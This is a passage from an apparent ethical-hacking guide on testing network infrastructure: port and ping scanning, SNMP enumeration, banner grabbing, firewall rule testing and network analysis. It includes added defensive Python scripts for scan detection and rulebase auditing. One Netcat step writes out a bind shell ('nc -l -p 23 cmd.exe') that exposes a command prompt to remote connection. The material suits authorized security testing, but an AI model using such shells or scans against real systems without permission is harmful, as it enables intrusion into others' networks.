- Cain & Abel (www.oxid.it/cain.html) for network analysis and ARP poisoning
- Essential NetTools (www.tamos.com/products/nettools) for a wide variety of network scanning functionality
- NetScanTools Pro (www.netscantools.com) for dozens of network security assessment functions, including ping sweeps, port scanning, and SMTP relay testing
- Getif (www.wtcs.org/snmp4tpc/getif.htm), an oldie but goodie tool for SNMP enumeration
- Nmap (http://nmap.org) — or NMapWin (http://sourceforge.net/projects/nmapwin), the happy-clicky-GUI front end to Nmap — for host-port probing and operating system fingerprinting
- Savvius OmniPeek (www.savvius.com) for network analysis
- Wireshark (www.wireshark.org) for network analysis
Vulnerability assessment
These vulnerability assessment tools, among others, allow you to test your network hosts for various known vulnerabilities as well as potential configuration issues that could lead to security exploits:
- GFI LanGuard (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard) for port scanning and vulnerability testing
- Nexpose (www.rapid7.com/vulnerability-scanner.jsp), an all-in-one tool for in-depth vulnerability testing
Scanning, Poking, and Prodding the Network
Performing the ethical hacks described in the following sections on your network infrastructure involves following basic hacking steps:
1. Gather information and map your network.
2. Scan your systems to see which ones are available.
3. Determine what's running on the systems discovered.
4. Attempt to penetrate the systems discovered if you choose to.
Every network card driver and implementation of TCP/IP in most operating systems, including Windows and Linux, and even in your firewalls and routers, has quirks that result in different behaviors when scanning, poking, and prodding your systems. This can result in different responses from your various systems, including everything from false-positive findings to denial of service (DoS) conditions. Refer to your administrator guides or vendor websites for details on any known issues and possible patches that are available to fix those issues. If you patched all your systems, you shouldn't have any issues — just know that anything's possible.
Scanning ports
A port scanner shows you what's what on your network by scanning the network to see what's alive and working. Port scanners provide basic views of how the network is laid out. They can help identify unauthorized hosts or applications and network host configuration errors that can cause serious security vulnerabilities.
The big-picture view from port scanners often uncovers security issues that might otherwise go unnoticed. Port scanners are easy to use and can test network hosts regardless of what operating systems and applications they're running. The tests are usually performed relatively quickly without having to touch individual network hosts, which would be a real pain otherwise.
The trick to assessing your overall network security is interpreting the results you get from a port scan. You can get false positives on open ports, and you might have to dig deeper. For example, User Datagram Protocol (UDP) scans — like the protocol itself — are less reliable than Transmission Control Protocol (TCP) scans and often produce false positives because many applications don't know how to respond to random incoming UDP requests.
A feature-rich scanner such as Nexpose often can identify ports and see what's running in one step.
Port scans can take a good bit of time. The length of time depends on the number of hosts you have, the number of ports you scan, the tools you use, the processing power of your test system, and the speed of your network links.
An important tenet to remember is that you need to scan more than just the important hosts. Leave no stone unturned — if not at first, then eventually. These other systems often bite you if you ignore them. Also, perform the same tests with different utilities to see whether you get different results. Not all tools find the same open ports and vulnerabilities. This is unfortunate, but it's a reality of ethical hacking tests.
If your results don't match after you run the tests using different tools, you might want to explore the issue further. If something doesn't look right — such as a strange set of open ports — it probably isn't. Test again; if you're in doubt, use another tool for a different perspective.
If possible, you should scan all 65,534 TCP ports on each network host that your scanner finds. If you find questionable ports, look for documentation that the application is known and authorized. It's not a bad idea to scan all 65,534 UDP ports as well. Just know this can add a considerable amount of time to your scans.
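The "is this port known and authorized?" step above, turned into a script: it parses Nmap's grepable (-oG) output and reports every open port your documentation does not account for, flagging the commonly hacked ports from Table 9-1. This is an added example, not from the book; the scan lines and the AUTHORIZED allowlist are constructed stand-ins for a real scan and your own service inventory.

```python
"""Compare Nmap grepable (-oG) output with the services documented as authorized.

Added example, not from the book.  SAMPLE_GREPABLE is a constructed scan
result in Nmap's -oG line format and AUTHORIZED is an assumed allowlist
standing in for your own documentation of which ports each host may
expose.  Ports from Table 9-1 are flagged so they get looked at first.
"""

# Constructed sample of what `nmap -sS -sU -oG - <hosts>` prints (no real hosts).
SAMPLE_GREPABLE = """\
# Nmap 7.01 scan initiated as: nmap -sS -sU -oG - 192.168.1.10 192.168.1.20
Host: 192.168.1.10 (fileserver)\tStatus: Up
Host: 192.168.1.10 (fileserver)\tPorts: 22/open/tcp//ssh///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 23/open/tcp//telnet///\tIgnored State: closed (65531)
Host: 192.168.1.20 (printer)\tStatus: Up
Host: 192.168.1.20 (printer)\tPorts: 80/open/tcp//http///, 9100/open/tcp//jetdirect///, 161/open|filtered/udp//snmp///\tIgnored State: closed (65532)
# Nmap done
"""

# Assumed allowlist: host -> set of "port/proto" that documentation says is authorized.
AUTHORIZED = {
    "192.168.1.10": {"22/tcp", "139/tcp", "445/tcp"},
    "192.168.1.20": {"80/tcp", "9100/tcp"},
}

# Commonly hacked ports from Table 9-1.
COMMONLY_HACKED = {7, 19, 20, 21, 22, 23, 25, 37, 53, 69, 79, 80, 110, 111, 135,
                   137, 138, 139, 445, 161, 443, 512, 513, 514, 1433, 1434, 1723, 3389, 8080}


def parse_grepable(text):
    """Yield (host, port, proto, state, service) for every port entry in -oG output.

    Each entry has the form port/state/proto/owner/service/rpcinfo/version/.
    """
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 5 or not fields[0].isdigit():
                continue
            yield host, int(fields[0]), fields[2], fields[1], fields[4]


def unauthorized_open_ports(text, authorized=AUTHORIZED):
    """Open ports the allowlist does not cover.

    UDP 'open|filtered' results are kept because they need a human look,
    but as the text says they are often false positives.
    """
    findings = []
    for host, port, proto, state, service in parse_grepable(text):
        if not state.startswith("open"):
            continue                          # closed/filtered ports are not exposure
        key = f"{port}/{proto}"
        if key in authorized.get(host, set()):
            continue
        findings.append({"host": host, "port": key, "service": service, "state": state,
                         "commonly_hacked": port in COMMONLY_HACKED})
    return findings


if __name__ == "__main__":
    for f in unauthorized_open_ports(SAMPLE_GREPABLE):
        flag = " [Table 9-1 port]" if f["commonly_hacked"] else ""
        print(f"{f['host']} {f['port']} {f['service']} ({f['state']}){flag}")
```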
For speed and simplicity, you can scan the commonly hacked ports, listed in Table 9-1.
Table 9-1 Commonly Hacked Ports
Port Number         Service                                                               Protocol(s)
7                   Echo                                                                  TCP, UDP
19                  Chargen                                                               TCP, UDP
20                  FTP data (File Transfer Protocol)                                     TCP
21                  FTP control                                                           TCP
22                  SSH                                                                   TCP
23                  Telnet                                                                TCP
25                  SMTP (Simple Mail Transfer Protocol)                                  TCP
37                  Time                                                                  TCP, UDP
53                  DNS (Domain Name System)                                              UDP
69                  TFTP (Trivial File Transfer Protocol)                                 UDP
79                  Finger                                                                TCP, UDP
80                  HTTP (Hypertext Transfer Protocol)                                    TCP
110                 POP3 (Post Office Protocol version 3)                                 TCP
111                 SUN RPC (remote procedure calls)                                      TCP, UDP
135                 RPC/DCE (endpoint mapper) for Microsoft networks                      TCP, UDP
137, 138, 139, 445  NetBIOS over TCP/IP                                                   TCP, UDP
161                 SNMP (Simple Network Management Protocol)                             TCP, UDP
443                 HTTPS (HTTP over TLS)                                                 TCP
512, 513, 514       Berkeley r-services and r-commands (such as rsh, rexec, and rlogin)   TCP
1433                Microsoft SQL Server (ms-sql-s)                                       TCP, UDP
1434                Microsoft SQL Monitor (ms-sql-m)                                      TCP, UDP
1723                Microsoft PPTP VPN                                                    TCP
3389                Windows Terminal Server                                               TCP
8080                HTTP proxy                                                            TCP
Ping sweeping
A ping sweep of all your network subnets and hosts is a good way to find out which hosts are alive and kicking on the network. A ping sweep is when you ping a range of addresses using Internet Control Message Protocol (ICMP) packets. Figure 9-1 shows the command and the results of using Nmap to perform a ping sweep of a class C subnet range.
Figure 9-1: Performing a ping sweep of an entire class C network with Nmap.
Dozens of Nmap command line options exist, which can be overwhelming when you want only a basic scan. Nonetheless, you can enter nmap on the command line to see all the options available.
The following command line options can be used for an Nmap ping sweep:
- -sP tells Nmap to perform a ping scan.
- -n tells Nmap not to perform name resolution.
- -T4 tells Nmap to perform an aggressive (faster) scan.
- 192.168.1.1-254 tells Nmap to scan the entire 192.168.1.0 subnet.
Using port scanning tools
Most port scanners operate in three steps:
1. The port scanner sends TCP SYN requests to the host or range of hosts you set it to scan.
   Some port scanners perform ping sweeps to determine which hosts are available before starting the TCP port scans.
   Most port scanners by default scan only TCP ports. Don't forget about UDP ports. You can scan UDP ports with a UDP port scanner, such as Nmap.
2. The port scanner waits for replies from the available hosts.
3. The port scanner probes these available hosts for up to 65,534 possible TCP and UDP ports — based on which ports you tell it to scan — to see which ones have available services on them.
The port scans provide the following information about the live hosts on your network:
- Hosts that are active and reachable through the network
- Network addresses of the hosts found
- Services or applications that the hosts may be running
After performing a generic sweep of the network, you can dig deeper into specific hosts you find.
Nmap
After you have a general idea of what hosts are available and what ports are open, you can perform fancier scans to verify that the ports are actually open and not returning a false positive. Nmap allows you to run the following additional scans:
- Connect: This basic TCP scan looks for any open TCP ports on the host. You can use this scan to see what's running and determine whether intrusion prevention systems (IPSs), firewalls, or other logging devices log the connections.
- UDP scan: This basic UDP scan looks for any open UDP ports on the host. You can use this scan to see what's running and determine whether IPSs, firewalls, or other logging devices log the connections.
- SYN Stealth: This scan creates a half-open TCP connection with the host, possibly evading IPS systems and logging. This is a good scan for testing IPSs, firewalls, and other logging devices.
- FIN Stealth, Xmas Tree, and Null: These scans let you mix things up a bit by sending strangely formed packets to your network hosts so you can see how they respond. These scans change around the flags in the TCP headers of each packet, which allows you to test how each host handles them to point out weak TCP/IP implementations as well as patches that might need to be applied.
Be careful when performing these scans. You can create your own DoS attack and potentially crash applications or entire systems. Unfortunately, if you have a host with a weak TCP/IP stack (the software that controls TCP/IP communications on your hosts), there's no good way to prevent your scan from creating a DoS attack. A good way to help reduce the chance of this occurring is to use the slow Nmap timing options — Paranoid, Sneaky, or Polite — when running your scans.
Figure 9-2 shows the NMapWin Scan tab, where you can select the Scan Mode options (Connect, UDP Scan, and so on). If you're a command line fan, you see the command line parameters displayed in the lower-left corner of the NMapWin screen. This helps when you know what you want to do and the command line help isn't enough.
Figure 9-2: In-depth port-scanning options in NMapWin.
If you connect to a single port (as opposed to several all at one time) without making too much noise, you might be able to evade your firewall or IPS. This is a good test of your network security controls, so look at your logs to see what they saw during this process.
NetScanTools Pro
NetScanTools Pro (www.netscantools.com) is a very nice all-in-one commercial tool for gathering general network information, such as the number of unique IP addresses, NetBIOS names, and MAC addresses. It also has a neat feature that allows you to fingerprint the operating systems of various hosts. Figure 9-3 shows the OS Fingerprinting results while scanning a wireless network access point.
Figure 9-3: NetScanTools Pro OS Fingerprinting tool.
Countermeasures against ping sweeping and port scanning
Enable only the traffic you need to access internal hosts — preferably as far as possible from the hosts you're trying to protect — and deny everything else. This goes for standard ports, such as TCP 80 for HTTP and ICMP for ping requests.
Configure firewalls to look for potentially malicious behavior over time (such as the number of packets received in a certain period of time) and have rules in place to cut off attacks if a certain threshold is reached, such as 10 port scans in one minute or 100 consecutive ping (ICMP) requests.
Most firewalls and IPSs can detect such scanning and cut it off in real time.
You can break applications on your network when restricting network traffic, so make sure that you analyze what's going on and understand how applications and protocols are working before you disable any type of network traffic.
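The two thresholds above (10 ports in one minute, 100 consecutive ICMP requests) as detection logic you can run over firewall drop logs to confirm what your firewall or IPS is, or is not, catching. This is an added example, not from the book; the log lines are constructed in an iptables-style key=value layout, and the three source addresses in them are made up.

```python
"""Flag port scans and ping floods in firewall logs with the thresholds given above.

Added example, not from the book.  Alerts when one source hits 10 or more
distinct ports within one minute, or sends 100 consecutive ICMP requests.
The log lines are constructed in an iptables-style key=value layout
(SRC= DST= PROTO= DPT=); adapt parse_line() to your firewall's format.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

SCAN_PORTS = 10        # distinct destination ports from one source ...
SCAN_WINDOW = 60       # ... within this many seconds => port scan
ICMP_RUN = 100         # consecutive ICMP packets from one source => ping sweep/flood

LINE_RE = re.compile(
    r"^(?P<ts>\S+) .*?SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=(?P<proto>\S+)"
    r"(?: .*?DPT=(?P<dpt>\d+))?")


def parse_line(line):
    """Extract timestamp, source, destination, protocol and destination port (None for ICMP)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m.group("ts")), "src": m.group("src"),
            "dst": m.group("dst"), "proto": m.group("proto"),
            "dpt": int(m.group("dpt")) if m.group("dpt") else None}


def detect(lines):
    """Return one alert string per source the first time it crosses a threshold."""
    alerts, flagged = [], set()
    recent = defaultdict(deque)     # src -> (ts, (dst, dpt)) seen within SCAN_WINDOW
    icmp_run = defaultdict(int)     # src -> current run of consecutive ICMP packets
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        src = ev["src"]
        if ev["proto"] == "ICMP":
            icmp_run[src] += 1
            if icmp_run[src] >= ICMP_RUN and (src, "ping") not in flagged:
                flagged.add((src, "ping"))
                alerts.append(f"{src}: {ICMP_RUN} consecutive ICMP requests (ping sweep/flood)")
            continue
        icmp_run[src] = 0           # any non-ICMP packet breaks the consecutive run
        window = recent[src]
        window.append((ev["ts"], (ev["dst"], ev["dpt"])))
        while (ev["ts"] - window[0][0]).total_seconds() > SCAN_WINDOW:
            window.popleft()
        distinct = {target for _, target in window}
        if len(distinct) >= SCAN_PORTS and (src, "scan") not in flagged:
            flagged.add((src, "scan"))
            alerts.append(f"{src}: {len(distinct)} distinct ports in {SCAN_WINDOW}s (port scan)")
    return alerts


def make_line(ts, src, dst, proto, dpt=None):
    """Build one constructed iptables-style log line."""
    tail = "PROTO=ICMP TYPE=8" if proto == "ICMP" else f"PROTO={proto} SPT=40000 DPT={dpt}"
    return f"{ts.isoformat()} fw kernel: DROP IN=eth0 OUT= SRC={src} DST={dst} LEN=60 {tail}"


def sample_log():
    """Constructed log: one port scanner, one ping flooder, one ordinary web client."""
    base = datetime(2016, 1, 1, 9, 0, 0)
    lines = []
    for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389]):
        lines.append(make_line(base + timedelta(seconds=2 * i), "10.0.0.5", "192.168.1.10", "TCP", port))
    for i in range(120):
        lines.append(make_line(base + timedelta(seconds=i), "10.0.0.6", "192.168.1.10", "ICMP"))
    for i, port in enumerate([80, 443, 80]):
        lines.append(make_line(base + timedelta(seconds=5 * i), "10.0.0.7", "192.168.1.10", "TCP", port))
    return lines


if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```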
Scanning SNMP
Simple Network Management Protocol (SNMP) is built into virtually every network device. Network management programs (such as HP OpenView and LANDesk) use SNMP for remote network host management. Unfortunately, SNMP also presents security vulnerabilities.
Vulnerabilities
The problem is that most network hosts run SNMP enabled with the default read/write community strings of public/private. The majority of network devices I come across have SNMP enabled and don't even need it.
If SNMP is compromised, a hacker may be able to gather such network information as ARP tables, usernames, and TCP connections to attack your systems further. If SNMP shows up in port scans, you can bet that a malicious attacker will try to compromise the system.
Here are some utilities for SNMP enumeration:
- The commercial tools NetScanTools Pro and Essential NetTools
- Free Windows GUI-based Getif
- Free Windows text-based SNMPUTIL (www.wtcs.org/snmp4tpc/FILES/Tools/SNMPUTIL/SNMPUTIL.zip)
You can use Getif to enumerate systems with SNMP enabled, as shown in Figure 9-4.
Figure 9-4: General SNMP information gathered by Getif.
In this test, I was able to glean a lot of information from a wireless access point, including model number, firmware revision, and system uptime. All this could be used against the host if an attacker wanted to exploit a known vulnerability in this particular system. By digging in further, I was able to discover several management interface usernames on this access point, as shown in Figure 9-5. You certainly don't want to show the world this information.
Figure 9-5: Management interface user IDs gleaned via Getif's SNMP browsing function.
For a list of vendors and products affected by the well-known SNMP vulnerabilities, refer to www.cert.org/historical/advisories/CA-2002-03.cfm.
Countermeasures against SNMP attacks
Preventing SNMP attacks can be as simple as A-B-C:
- Always disable SNMP on hosts if you're not using it — period.
- Block the SNMP ports (UDP ports 161 and 162) at the network perimeter.
- Change the default SNMP community read string from public and the default community write string from private to another long and complex value that's virtually impossible to guess.
There's technically a "U" that's part of the solution: upgrade. Upgrading your systems (at least the ones you can) to SNMP version 3 can resolve many of the well-known SNMP security weaknesses.
Grabbing banners
Banners are the welcome screens that divulge software version numbers and other system information on network hosts. This banner information might identify the operating system, the version number, and the specific service packs to give the bad guys a leg up on attacking the network. You can grab banners by using either good old telnet or some of the tools I mention, such as Nmap and SuperScan.
telnet
You can telnet to hosts on the default telnet port (TCP port 23) to see whether you're presented with a login prompt or any other information. Just enter the following line at the command prompt in Windows or UNIX:
telnet ip_address
You can telnet to other commonly used ports with these commands:
SMTP: telnet ip_address 25
HTTP: telnet ip_address 80
POP3: telnet ip_address 110
Figure 9-6 shows specific version information about an IceWarp e-mail server when telnetting to it on port 25. For help with telnet, simply enter telnet /? or telnet help for specific guidance on using the program.
Figure 9-6: Information gathered about an e-mail server via telnet.
Countermeasures against banner-grabbing attacks
The following steps can reduce the chance of banner-grabbing attacks:
If there isn't a business need for services that offer banner information, disable those unused services on the network host.
If there isn't a business need for the default banners, or if you can customize the banners, configure the network host's application or operating system to either disable the banners or remove information from the banners that could give an attacker a leg up. Check with your specific vendor for information on how to do this. TCP Wrappers in Linux is another solution.
If you can customize your banners, check with your lawyer about adding a warning banner. It won't stop banner grabbing but will show would-be intruders that the system is private and monitored (assuming it truly is). A warning banner may also help reduce your business liability in the event of a security breach. Here's an example:
Warning! This is a private system. All use is monitored and recorded. Any unauthorized use of this system may result in civil and/or criminal prosecution to the fullest extent of the law.
Testing firewall rules
As part of your ethical hacking, you can test your firewall rules to make sure they're working as they're supposed to.
Testing
A few tests can verify that your firewall actually does what it says it's doing. You can connect through the firewall on the ports that are open, but what about the ports that can be open but shouldn't be?
Netcat
Netcat (http://netcat.sourceforge.net) can test certain firewall rules without having to test a production system directly. For example, you can check whether the firewall allows port 23 (telnet) through. Follow these steps to see whether a connection can be made through port 23:
1. Load Netcat on a client machine inside the network.
This sets up the outbound connection.
2. Load Netcat on a testing computer outside the firewall.
This allows you to test from the outside in.
3. Enter the Netcat listener command on the client (internal) machine with the port number you're testing.
For example, if you're testing port 23, enter this command: nc -l -p 23 cmd.exe
4. Enter the Netcat command to initiate an inbound session on the testing (external) machine. You must include the following information:
The IP address of the internal machine you're testing
The port number you're testing
For example, if the IP address of the internal (client) machine is 10.11.12.2 and the port is 23, enter this command: nc -v 10.11.12.2 23
If Netcat presents you with a new command prompt (that's what the cmd.exe is for in Step 3) on the external machine, you've connected and can execute commands on the internal machine! This can serve several purposes, including testing firewall rules, network address translation (NAT), port forwarding and — well, uhhhmmm — executing commands on a remote system!
AlgoSec Firewall Analyzer
A commercial tool I often use with great results is AlgoSec's Firewall Analyzer (www.algosec.com) as shown in Figure 9-7.
Figure 9-7: Using AlgoSec Firewall Analyzer to uncover security gaffes in a firewall rulebase.
AlgoSec Firewall Analyzer, and similar ones such as SolarWinds Firewall Security Manager (www.solarwinds.com/firewall-security-manager.aspx), allows you to perform an in-depth analysis of firewall rulebases from all the major vendors and find security flaws and inefficiencies you'd never uncover otherwise. Firewall rulebase analysis is a lot like software source code analysis — it finds flaws at the source that humans would likely never see even when performing in-depth security tests from the Internet and the internal network. If you've never performed a firewall rulebase analysis, it's a must!
Countermeasures against firewall rulebase vulnerabilities
The following countermeasures can prevent a hacker from testing your firewall:
Perform a firewall rulebase audit. I'm always saying that you cannot secure what you don't acknowledge. There's no better example of this than your firewall rulebases. No matter how seemingly simplistic your rulebase is, it never hurts to verify your work using an automated tool.
Limit traffic to what's needed.
Set rules on your firewall (and router, if needed) that pass only traffic that absolutely must pass. For example, have rules in place that allow HTTP inbound traffic to an internal web server, SMTP inbound traffic to an e-mail server, and HTTP outbound traffic for external web access.
This is the best defense against someone poking at your firewall.
Block ICMP to help prevent an external attacker from poking and prodding your network to see which hosts are alive.
Enable stateful packet inspection on the firewall to block unsolicited requests.
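A small illustration of what a rulebase audit looks for: shadowed rules, redundant rules, and an any-any allow, checked with first-match semantics over a rulebase modelled on the HTTP-in/SMTP-in/HTTP-out example above. This is an added example, not the book's code and not AlgoSec's or SolarWinds' product; the rule format, names and networks are constructed.

```python
"""Offline firewall rulebase analysis: shadowed, redundant and any-any rules.

Added example, not from the book and not AlgoSec's or SolarWinds' code: a
minimal version of the kind of check those analyzers perform, run over a
constructed rulebase in a simplified vendor-neutral form. The first matching
rule wins, as on most firewalls. Names, networks and rules are constructed.
"""
from dataclasses import dataclass
from ipaddress import IPv4Network, ip_network
from typing import List, Optional, Tuple

ANY_NET = ip_network("0.0.0.0/0")


@dataclass(frozen=True)
class Rule:
    name: str
    action: str              # "allow" or "deny"
    proto: str               # "tcp", "udp", "icmp" or "any"
    src: IPv4Network
    dst: IPv4Network
    dport: Optional[int]     # None means any destination port


def rule(name, action, proto, src, dst, dport=None) -> Rule:
    return Rule(name, action, proto, ip_network(src), ip_network(dst), dport)


def covers(outer: Rule, inner: Rule) -> bool:
    """True when every packet `inner` would match is already matched by `outer`."""
    return (
        outer.proto in ("any", inner.proto)
        and inner.src.subnet_of(outer.src)
        and inner.dst.subnet_of(outer.dst)
        and outer.dport in (None, inner.dport)
    )


def is_any_any(r: Rule) -> bool:
    return r.proto == "any" and r.src == ANY_NET and r.dst == ANY_NET and r.dport is None


def analyze(rules: List[Rule]) -> List[Tuple[str, str]]:
    """Return (rule name, finding) pairs in rulebase order."""
    findings = []
    for index, later in enumerate(rules):
        for earlier in rules[:index]:
            if covers(earlier, later):
                # With first-match semantics `later` can never be reached: it is either
                # harmless duplication (same action) or a silently disabled rule.
                kind = "redundant" if earlier.action == later.action else "shadowed"
                findings.append((later.name, f"{kind} by {earlier.name}"))
                break
        if later.action == "allow" and is_any_any(later):
            findings.append((later.name, "allows any-any"))
    if not rules or rules[-1].action != "deny" or not is_any_any(rules[-1]):
        findings.append(("rulebase", "no final deny-all rule"))
    return findings


# Constructed rulebase modelled on the text's example (HTTP in, SMTP in, HTTP out),
# with two mistakes planted: a leftover "temporary" allow-all and a duplicated rule.
SAMPLE_RULES = [
    rule("inbound-http", "allow", "tcp", "0.0.0.0/0", "10.11.12.10/32", 80),
    rule("inbound-smtp", "allow", "tcp", "0.0.0.0/0", "10.11.12.20/32", 25),
    rule("outbound-http", "allow", "tcp", "10.11.12.0/24", "0.0.0.0/0", 80),
    rule("outbound-https", "allow", "tcp", "10.11.12.0/24", "0.0.0.0/0", 443),
    rule("temp-allow-all", "allow", "any", "0.0.0.0/0", "0.0.0.0/0"),
    rule("block-telnet", "deny", "tcp", "0.0.0.0/0", "10.11.12.10/32", 23),
    rule("outbound-http-dup", "allow", "tcp", "10.11.12.0/25", "0.0.0.0/0", 80),
    rule("default-deny", "deny", "any", "0.0.0.0/0", "0.0.0.0/0"),
]


def without(rules, name):
    """The rulebase with one rule removed, to re-run the analysis after a fix."""
    return [r for r in rules if r.name != name]


if __name__ == "__main__":
    for name, finding in analyze(SAMPLE_RULES):
        print(f"{name}: {finding}")
```

Removing the any-any rule and re-running shows the final deny becoming reachable again, leaving only the duplicate outbound rule to clean up.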
Analyzing network data
A network analyzer is a tool that allows you to look into a network and analyze data going across the wire for network optimization, security, and/or troubleshooting purposes. Like a microscope for a lab scientist, a network analyzer is a must-have tool for any security professional.
Network analyzers are often generically referred to as sniffers, though that's actually the name and trademark of a specific product from Network Associates' original Sniffer network analysis tool.
A network analyzer is handy for sniffing packets on the wire. A network analyzer is simply software running on a computer with a network card. It works by placing the network card in promiscuous mode, which enables the card to see all the traffic on the network, even traffic not destined for the network analyzer's host. The network analyzer performs the following functions:
Captures all network traffic
Interprets or decodes what is found into a human-readable format
Displays the content in chronological order (or however you choose to see it)
When assessing security and responding to security incidents, a network analyzer can help you
View anomalous network traffic and even track down an intruder.
Develop a baseline of network activity and performance, such as protocols in use, usage trends, and MAC addresses, before a security incident occurs.
When your network behaves erratically, a network analyzer can help you
Track and isolate malicious network usage
Detect malicious Trojan horse applications
Monitor and track down DoS attacks
Network analyzer programs
You can use one of the following programs for network analysis:
Savvius OmniPeek (www.savvius.com) is one of my favorite network analyzers. It does everything I need and more and is very simple to use. OmniPeek is available for Windows operating systems.
TamoSoft's CommView (www.tamos.com/products/commview) is a great, low-cost, Windows-based alternative.
Cain & Abel (www.oxid.it/cain.html) is a free multifunctional password recovery tool for performing ARP poisoning, capturing packets, cracking passwords, and more.
Wireshark (www.wireshark.org), formerly known as Ethereal, is a free alternative. I download and use this tool if I need a quick fix and don't have my laptop nearby. It's not as user-friendly as most of the commercial products, but it is very powerful if you're willing to learn its ins and outs. Wireshark is available for both Windows and OS X.
ettercap (http://ettercap.github.io/ettercap/) is another powerful (and free) utility for performing network analysis and much more on Windows, Linux, and other operating systems.
Here are a few caveats for using a network analyzer:
To capture all traffic, you must connect the analyzer to one of the following:
A hub on the network
A monitor/span/mirror port on a switch
A switch that you've performed an ARP poisoning attack on
If you want to see traffic similar to what a network-based IPS sees, you should connect the network analyzer to a hub or switch monitor port — or even a network tap — on the outside of the firewall, as shown in Figure 9-8. This way, your testing enables you to view
What's entering your network before the firewall filters eliminate the junk traffic.
What's leaving your network after the traffic passes through the firewall.
Figure 9-8: Connecting a network analyzer outside the firewall.
Whether you connect your network analyzer inside or outside your firewall, you see immediate results. It can be an overwhelming amount of information, but you can look for these issues first:
Odd traffic, such as:
An unusual amount of ICMP packets
Excessive amounts of multicast or broadcast traffic
Protocols that aren't permitted by policy or shouldn't exist given your current network configuration
Internet usage habits, which can help point out malicious behavior of a rogue insider or system that has been compromised, such as:
Web surfing and social media
E-mail
Instant messaging and other P2P software
Questionable usage, such as:
Many lost or oversized packets, indicating hacking tools or malware are present
High bandwidth consumption that might point to a web or FTP server that doesn't belong
Reconnaissance probes and system profiling from port scanners and vulnerability assessment tools, such as a significant amount of inbound traffic from unknown hosts — especially over ports that aren't used very much, such as FTP or telnet.
Hacking in progress, such as tons of inbound UDP or ICMP echo requests, SYN floods, or excessive broadcasts.
Nonstandard hostnames on your network. For example, if your systems are named Computer1, Computer2, and so on, a computer named GEEKz4evUR should raise a red flag.
Hidden servers (especially web, SMTP, FTP, DNS, and DHCP) that might be eating network bandwidth, serving illegal software, or accessing your network hosts.
Attacks on specific applications that show such commands as /bin/rm, /bin/ls, echo, and cmd.exe as well as SQL queries and JavaScript injection, which I cover in Chapter 15.
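Several of the checks in the list above (unusual ICMP share, excessive broadcast, disallowed protocols, hidden servers, and the top talkers mentioned later), run over a capture summary. This is an added example, not the book's code and not the output of OmniPeek, CommView or Wireshark; the tab-separated summary format (of the kind tshark can export), the site network, the policy and the packets are all constructed.

```python
"""Triage of a constructed packet summary for the anomalies the text lists.

Added example, not from the book and not OmniPeek, CommView or Wireshark
code: a tab-separated summary of the kind `tshark -T fields` can produce is
constructed inline, then checked for an unusual share of ICMP, excessive
broadcast/multicast, protocols not permitted by policy, hidden servers, and
the top talkers by bytes. Network, hosts, policy and packets are constructed.
"""
from collections import Counter
from ipaddress import ip_address, ip_network

SITE_NET = ip_network("10.11.12.0/24")
APPROVED_SERVERS = {"10.11.12.10": {80, 443}, "10.11.12.20": {25}}   # host -> allowed service ports
SERVER_PORTS = {21: "FTP", 25: "SMTP", 53: "DNS", 67: "DHCP", 80: "HTTP"}
DISALLOWED_PROTOS = {"TELNET", "IRC", "TFTP"}   # not permitted by (constructed) policy
ICMP_MAX_SHARE = 0.10
BCAST_MAX_SHARE = 0.20


def parse_summary(text):
    """Parse 'src<TAB>dst<TAB>proto<TAB>length<TAB>dport' lines (dport may be empty)."""
    packets = []
    for line in text.splitlines():
        if not line.strip():
            continue
        src, dst, proto, length, dport = line.split("\t")
        packets.append({"src": src, "dst": dst, "proto": proto,
                        "len": int(length), "dport": int(dport) if dport else None})
    return packets


def is_broadcast_or_multicast(addr):
    ip = ip_address(addr)
    return ip.is_multicast or ip == SITE_NET.broadcast_address or addr == "255.255.255.255"


def triage(packets, top_n=3):
    """Return (findings, top_talkers) for one capture summary."""
    if not packets:
        return [], []
    findings = []
    total = len(packets)
    icmp = sum(p["proto"] == "ICMP" for p in packets)
    if icmp / total > ICMP_MAX_SHARE:
        findings.append(f"ICMP is {icmp / total:.0%} of packets")
    bcast = sum(is_broadcast_or_multicast(p["dst"]) for p in packets)
    if bcast / total > BCAST_MAX_SHARE:
        findings.append(f"broadcast/multicast is {bcast / total:.0%} of packets")
    for proto in sorted({p["proto"] for p in packets} & DISALLOWED_PROTOS):
        findings.append(f"protocol not permitted by policy: {proto}")
    # A server port on an internal host that is not an approved server: a hidden server.
    hidden = set()
    for p in packets:
        service = SERVER_PORTS.get(p["dport"])
        if service and ip_address(p["dst"]) in SITE_NET \
                and p["dport"] not in APPROVED_SERVERS.get(p["dst"], ()):
            hidden.add((p["dst"], service))
    for host, service in sorted(hidden):
        findings.append(f"possible hidden {service} server at {host}")
    bytes_by_host = Counter()
    for p in packets:
        bytes_by_host[p["src"]] += p["len"]
        bytes_by_host[p["dst"]] += p["len"]
    return findings, bytes_by_host.most_common(top_n)


def build_sample_summary():
    """Constructed capture: normal web and mail, plus the anomalies planted below."""
    rows = []
    rows += [("10.11.12.5", "10.11.12.10", "HTTP", 600, 80)] * 10
    rows += [("10.11.12.5", "10.11.12.20", "SMTP", 300, 25)] * 5
    rows += [("203.0.113.9", f"10.11.12.{i}", "ICMP", 74, "") for i in range(1, 7)]  # outside host pinging the subnet
    rows += [("10.11.12.7", "10.11.12.3", "TELNET", 66, 23)]          # cleartext admin protocol
    rows += [("10.11.12.8", "10.11.12.33", "FTP", 1400, 21)] * 8      # unapproved, busy FTP server
    rows += [("10.11.12.4", "10.11.12.255", "NBNS", 92, 137)] * 2     # ordinary name broadcasts
    return "\n".join("\t".join(str(field) for field in row) for row in rows) + "\n"


if __name__ == "__main__":
    findings, top = triage(parse_summary(build_sample_summary()))
    print("\n".join(findings))
    print("top talkers:", top)
```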
You might need to let your network analyzer run for quite a while — several hours to several days, depending on what you're looking for. Before getting started, configure your network analyzer to capture and store the most relevant data:
